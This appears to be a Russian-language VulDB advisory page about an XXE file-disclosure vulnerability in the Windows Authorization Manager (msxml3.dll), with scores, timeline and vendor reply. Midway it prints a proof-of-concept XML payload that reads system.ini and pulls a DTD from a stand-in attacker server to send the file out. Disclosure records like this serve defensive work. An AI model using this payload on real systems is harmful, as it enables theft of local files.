Microsoft Windows Authorization Manager msxml3.dll Файл раскрытие информации
| CVSS Meta Temp Score | Текущая цена эксплойта (≈) | Балл интереса CTI |
|---|---|---|
| 4.8 | $0-$5k | 0.00 |
Сводка
Уязвимость была найдена в Microsoft Windows. Она была классифицирована как проблематичный. Используемая неизвестная функция в библиотеке msxml3.dll компонента Authorization Manager. Выполнение манипуляции приводит к раскрытие информации (Файл). Атаку можно осуществить удаленно. Более того, существует эксплойт.
Подробности
Уязвимость была найдена в Microsoft Windows. Она была классифицирована как проблематичный. Используемая неизвестная функция в библиотеке msxml3.dll компонента Authorization Manager. Выполнение манипуляции приводит к раскрытие информации (Файл). Использование CWE для объявления проблемы приводит к тому, что CWE-200. Данная уязвимость была опубликована 04.12.2016 исследователем John Page (hyp3rlinx) с идентификатором Microsoft Authorization Manager "azman" XML External Entity в виде Mailinglist Post (Full-Disclosure). Консультация доступна для загрузки на seclists.org. Продавец сотрудничал в координации публичного релиза.
Атаку можно осуществить удаленно. Имеются технические подробности. Данная уязвимость менее популярна, чем в среднем. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. На текущий момент стоимость эксплойта может быть примерно USD $0-$5k. Согласно MITRE ATT&CK, техника атаки, используемая в данной проблеме, имеет значение T1592.
Это объявлено как Доказательство концепции. Эксплойт можно скачать по ссылке seclists.org. Уязвимость обрабатывалась как непубличный эксплойт нулевого дня в течение как минимум 96 дней. Как 0-day, оценочная цена на теневом рынке составляла примерно $25k-$100k. Код, используемый эксплойтом, следующий:
<?xml version="1.0"?> <!DOCTYPE roottag [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd";> %dtd;]> <pwn>&send;</pwn>
В предупреждении указано следующее:
Vendor Reply: August 30, 2016 does not meet the bar for servicing as someone would have to obtain the XML from an untrusted source or compromised source"
Продукт
Тип
Поставщик
Имя
Лицензия
Веб-сайт
- Поставщик: https://www.microsoft.com/
- Продукт: https://www.microsoft.com/en-us/windows
CPE 2.3
CPE 2.2
CVSSv4
VulDB Вектор: 🔍VulDB Надёжность: 🔍
CVSSv3
VulDB Meta Base Score: 5.3VulDB Meta Temp Score: 4.8
VulDB Базовый балл: 5.3
VulDB Временная оценка: 4.8
VulDB Вектор: 🔍
VulDB Надёжность: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
|---|---|---|---|---|---|
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
| Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍
Эксплуатация
Имя: FileКласс: раскрытие информации / File
CWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
Физический: Нет
Локальный: Нет
Удалённый: Да
Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: John Page (hyp3rlinx)
Скачать: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍
| 0-Day | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
|---|---|---|---|---|
| Сегодня | Разблокировать | Разблокировать | Разблокировать | Разблокировать |
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендация: о смягчении не известноСтатус: 🔍
0-дневное время: 🔍
Задержка эксплуатации: 🔍
Хронология
30.08.2016 🔍30.08.2016 🔍
04.12.2016 🔍
04.12.2016 🔍
05.12.2016 🔍
24.07.2019 🔍
Источники
Поставщик: microsoft.comПродукт: microsoft.com
Консультация: Microsoft Authorization Manager "azman" XML External Entity
Исследователь: John Page (hyp3rlinx)
Статус: Не определено
Скоординированный: 🔍
GCVE (VulDB): GCVE-100-93963
scip Labs: https://www.scip.ch/en/?labs.20161013
Смотрите также: 🔍
Вход
Создано: 05.12.2016 21:47Обновлено: 24.07.2019 17:00
Изменения: 05.12.2016 21:47 (55), 24.07.2019 17:00 (2)
Завершенный: 🔍
Cache ID: 216::103
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Комментариев пока нет. Языки: ru + be + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.